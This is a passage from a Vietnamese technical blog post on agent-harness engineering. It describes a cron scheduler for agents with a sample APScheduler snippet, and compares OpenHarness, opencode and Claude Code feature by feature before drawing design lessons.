Tại sao quan trọng: Biến agent từ "on-demand" thành "proactive". User có thể set: "mỗi sáng 8h, check CI main branch xong ping Slack nếu fail", "mỗi 30 phút, pull Jira rồi update status". Persistent (JSON registry) → sống qua restart. History log JSONL → audit. Per-job enable/disable → maintenance dễ. Tick 30s là trade-off: đủ nhanh để không miss 1-phút-cron, đủ chậm để không spam. Croniter lib xử lý edge case (cuối tháng, DST).

Code example (generic)

import asyncio from apscheduler.schedulers.asyncio import AsyncIOScheduler from
      apscheduler.triggers.cron import CronTrigger async def agent_job(prompt:
      str): response = await run_agent(prompt)
      save_history(prompt, response) async def main(): scheduler = AsyncIOScheduler() # Cron: Mon-Fri 09:00 scheduler.add_job( agent_job,
      trigger=CronTrigger.from_crontab("0 9 * * 1-5"),
      args=["Summarize overnight alerts"], id="daily-triage", replace_existing=True, ) scheduler.start() await
      asyncio.Event().wait() # run forever
      
Ưu điểm
  • Agent thành proactive assistant — không cần user ping
  • Persist qua restart → reliability
  • History log cho audit + debug
  • Per-job enable/disable dễ pause khi maintenance
Nhược điểm
  • Tick 30s miss cron <30s granularity
  • Không distributed — nhiều instance chạy sẽ duplicate fire
  • JSON registry không concurrent-safe (write qua rename cần thêm)
  • Failure recovery phụ thuộc user đọc history — không có alert auto

Kết luận — So sánh OpenHarness · opencode · Claude Code

Sau 30 kỹ thuật, ta thấy rõ OpenHarness không chỉ là "Python port của Claude Code". Nó là một superset về khả năng automation, đánh đổi một phần bề mặt CLI elegance để mở rộng thành agent organization platform — nơi agent có thể sống trong subprocess độc lập, nghe từ N channel, chạy theo cron, và cô lập trong Docker.

Ba trục so sánh

Khía cạnhClaude Code (TS closed-source)opencode (sst/anomalyco TS)HKUDS/OpenHarness (Python)
Ngôn ngữTypeScript + BunTypeScript + Bun + Effect-TSPython 3.10+ + asyncio
TUIReact InkReact InkRich/Textual + React Ink (dual)
Agent loopReAct asyncReAct asyncReAct async, single/parallel branching
CompactionAuto-compactTail-preserving + templateProactive + reactive + PTL retry
Sub-agentTask tool in-sessionTask tool in-sessionSubprocess + worktree + mailbox
Permission3-mode + hookWildcard + arity + state3-mode + 6-layer + sensitive path
MemoryCLAUDE.mdCLAUDE.mdPer-project dir + MEMORY.md + search
Hooks6 events × 2 typesHook + Tool Hook6 events × 4 types + hot reload
SkillsMarkdown + frontmatterPrompt + tool filterMarkdown + frontmatter + plugin
MCPstdio + HTTPstdio + HTTPstdio + HTTP + dynamic Pydantic
ChannelsCLI onlyCLI onlySlack/Feishu/Discord/Telegram/Matrix
AutopilotN/AN/ADashboard + repo automation
SandboxN/AN/ADocker optional
CronN/AN/APersistent scheduler (30s tick)
LSPN/AN/AAST-based built-in

Khi nào nên chọn OpenHarness

OpenHarness phù hợp khi:
  • Team quen Python, muốn fork/customize sâu (không bị lock vào JS ecosystem)
  • Workflow cần long-running agent (Slack bot, cron triage, CI auto-fix)
  • Muốn multi-agent coordination thật (leader + worker + branch isolation qua worktree)
  • Cần sandbox Docker cho tool execution (compliance / security)
  • Muốn persistent memory có cấu trúc (per-project MEMORY.md tìm được qua CJK tokenizer)
Không nên chọn khi:
  • Chỉ cần pair-programming CLI đơn thuần → opencode hay Claude Code đơn giản hơn
  • Workflow monolithic, 1-agent-1-session — swarm + channels thành dead weight
  • Team toàn TS → fork/contribute dễ hơn với opencode

Bài học harness engineering rút ra

OpenHarness chứng minh rằng scaffolding quan trọng không kém model. Ba nguyên tắc lặp lại trong code:

  1. Atomic write — mọi state-changing file đều write(.tmp) → rename (mailbox, registry, permission sync). Tránh partial-read race.
  2. Layered evaluation — permission 6 layer, compaction 2 phase (proactive + reactive + PTL retry), prompt 9 section. Mỗi layer có chức năng riêng biệt, dễ reason về.
  3. Structured observability — streaming events với union type + 9-phase progress, JSONL history, hook pre/post → agent debug được qua log, không cần reproduce bằng tay.

Nếu bạn xây harness riêng, 5 ý tưởng nên copy từ OpenHarness ngay: (1) per-project memory hash, (2) CJK-aware tokenizer, (3) sensitive path hardcoded block, (4) subprocess + mailbox cho subagent, (5) dual-channel permission sync. Đó là những chi tiết rất dễ bỏ qua nếu chỉ nhìn "agent loop" ở high level, nhưng quyết định liệu harness có chạy được 24/7 trong production hay không.

Nguồn tham khảo

Repo & mã nguồn

Harness engineering

Context, compaction & memory

Tool design & safety

MCP & plugins

Multi-agent & swarm

Git worktree & IPC

Channels & LSP

Sandbox & cron

So sánh & failure modes